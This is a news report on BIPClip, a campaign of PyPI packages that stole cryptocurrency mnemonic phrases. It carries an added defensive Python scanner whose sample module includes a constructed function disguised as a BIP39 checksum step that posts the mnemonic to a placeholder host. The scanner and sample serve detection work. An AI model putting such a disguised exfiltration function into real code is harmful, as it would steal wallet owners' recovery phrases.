Threat hunters have discovered a set of seven packages in the Python Package Index (PyPI) repository designed to steal BIP39 mnemonic phrases used to recover the private keys of a cryptocurrency wallet.
The software supply chain attack campaign was codenamed BIPClip by ReversingLabs. The packages were downloaded a total of 7,451 times before being removed by PyPI. The package list is as follows:
BIPClip, which targets developers working on projects related to generating and securing cryptocurrency wallets, is said to have been active since at least December 4, 2022, when hashdecrypt was first published on the registry.
“This is just the latest software supply chain campaign to target crypto assets,” security researcher Karlo Zanki said in a report shared with The Hacker News. “This confirms that cryptocurrency continues to be one of the most popular targets for supply chain threat actors.”
Demonstrating that the threat actors behind the campaign were careful to avoid detection, one of the packages in question – mnemonic_to_address – was devoid of any malicious functionality, other than listing bip39-mnemonic-decrypt as its dependency, which contained the malicious component.
“Although they chose to examine package dependencies, the name of the imported module and the invoked function are carefully chosen to mimic legitimate functions and not raise suspicion, as implementations of the BIP39 standard include many cryptographic operations,” Zanki explained.
The package, for its part, is designed to steal mnemonic phrases and exfiltrate the information onto a server controlled by the actor.
Two other packages identified by ReversingLabs – public-address-generator and erc20-scanner – work similarly, with the first acting as a decoy to transmit the mnemonic phrases to the same command and control (C2) server.
The hashdecrypts package, on the other hand, works a little differently: it is not meant to operate as one half of a pair, and it carries almost identical data-collection code within itself.
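The pattern described above, a function named after a legitimate BIP39 operation whose body forwards the phrase to a remote host, is a reason not to triage a package by its identifiers alone. The following is an added example, not ReversingLabs' tooling or code from any of the packages named in the article: a small static scanner that parses a module with Python's `ast`, resolves import aliases, and flags any function that accepts a mnemonic- or seed-like parameter and also reaches a network-capable call. The parameter names, the call list and the constructed sample module are assumptions made for the example.

```python
"""Static triage for Python code that handles wallet-recovery material.

Added example: flags functions that take a mnemonic/seed-like parameter
and, somewhere in their body, call a network-capable API. Names of
functions and modules are deliberately not trusted.
"""
import ast

# Parameter names taken to indicate wallet-recovery material (assumed set).
SECRET_PARAMS = {"mnemonic", "seed", "seed_phrase", "phrase", "words",
                 "private_key", "privkey"}

# Dotted call targets that can move data off the host (assumed set).
NETWORK_CALLS = {
    "requests.get", "requests.post", "urllib.request.urlopen",
    "http.client.HTTPConnection", "http.client.HTTPSConnection",
    "socket.socket", "socket.create_connection",
}


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _resolve_aliases(tree):
    """Map local names to their imported origin so 'import requests as rq' is seen through."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:
                    aliases[a.asname] = a.name          # import a.b as c  -> c: a.b
                else:
                    root = a.name.split(".")[0]
                    aliases[root] = root                # import a.b       -> a: a
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def _canonical(name, aliases):
    """Rewrite the first component of a dotted call through the alias map."""
    root, _, rest = name.partition(".")
    origin = aliases.get(root, root)
    return f"{origin}.{rest}" if rest else origin


def find_secret_exfil_candidates(source):
    """Return [(function, secret_param, network_call, lineno)] for suspicious functions."""
    tree = ast.parse(source)
    aliases = _resolve_aliases(tree)
    findings = []
    for fn in ast.walk(tree):
        if not isinstance(fn, (ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        params = {a.arg for a in fn.args.args + fn.args.kwonlyargs}
        secret = sorted(params & SECRET_PARAMS)
        if not secret:
            continue  # no wallet material enters this function
        for node in ast.walk(fn):
            if isinstance(node, ast.Call):
                name = _dotted_name(node.func)
                if name is None:
                    continue
                target = _canonical(name, aliases)
                if target in NETWORK_CALLS:
                    findings.append((fn.name, secret[0], target, node.lineno))
    return findings


# Constructed sample module (not real package code) mixing benign and suspicious functions.
SAMPLE_MODULE = '''
import hashlib
import requests as rq
from urllib.request import urlopen as fetch

def mnemonic_to_seed(mnemonic, passphrase=""):
    # Local derivation only: expected for a BIP39 implementation.
    return hashlib.pbkdf2_hmac("sha512", mnemonic.encode(), ("mnemonic" + passphrase).encode(), 2048)

def validate_checksum(mnemonic):
    # Name mimics a BIP39 step, but the body sends the phrase off-host.
    rq.post("https://example.invalid/collect", data={"m": mnemonic})
    return True

def get_balance(address):
    # Network call without any secret parameter: not flagged.
    return fetch("https://example.invalid/balance/" + address).read()
'''

if __name__ == "__main__":
    for fn, param, call, line in find_secret_exfil_candidates(SAMPLE_MODULE):
        print(f"line {line}: {fn}({param}) reaches {call}")
```

This is a triage signal, not proof: it reads only one module's source, so a call hidden behind `getattr`, `importlib`, string obfuscation, or a dependency (the article's decoy package imports its malicious component rather than containing it) needs the dependency tree to be walked and each file scanned the same way. Dependency names and hand-picked function names are exactly what this campaign chose to look benign, so the check keys on what the function receives and where that data can leave.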
The package, according to the software supply chain security firm, includes references to a GitHub profile called “HashSnake,” which features a repository called hCrypto advertised as a way to extract mnemonic phrases from crypto wallets using the hashdecrypts package.
A closer look at the repository’s commit history reveals that the campaign has been running for over a year: one of the Python scripts was still importing the hashdecrypt package (without the “s”) instead of hashdecrypts as recently as March 1, 2024, the same date hashdecrypts was uploaded to PyPI.
It is worth pointing out that the threat actors behind the HashSnake account are also present on Telegram and YouTube to advertise their warez. This includes the release of a video on September 7, 2022, showcasing a crypto log checking tool called xMultiChecker 2.0.
“The contents of each of the discovered packages were carefully crafted to make them appear less suspicious,” Zanki said.
“They were focused on compromising crypto wallets and stealing the cryptocurrencies they contained. The lack of a broader agenda and ambition made it less likely that this campaign would undermine the security and monitoring tools used within the compromised organizations.”
The findings once again highlight the security threats that lurk in open source package repositories, exacerbated by the fact that legitimate services like GitHub are used as a conduit to distribute malware.
Furthermore, abandoned projects are becoming an attractive vector for threat actors to take control of developer accounts and publish Trojanized versions which could then pave the way for large-scale supply chain attacks.
“Abandoned digital assets are not relics of the past; they are time bombs, and attackers are increasingly taking advantage of them, turning them into Trojan horses within open source ecosystems,” Checkmarx noted last month.
“The MavenGate and CocoaPods case studies highlight how abandoned domains and subdomains could be hijacked to deceive users and spread malicious intent.”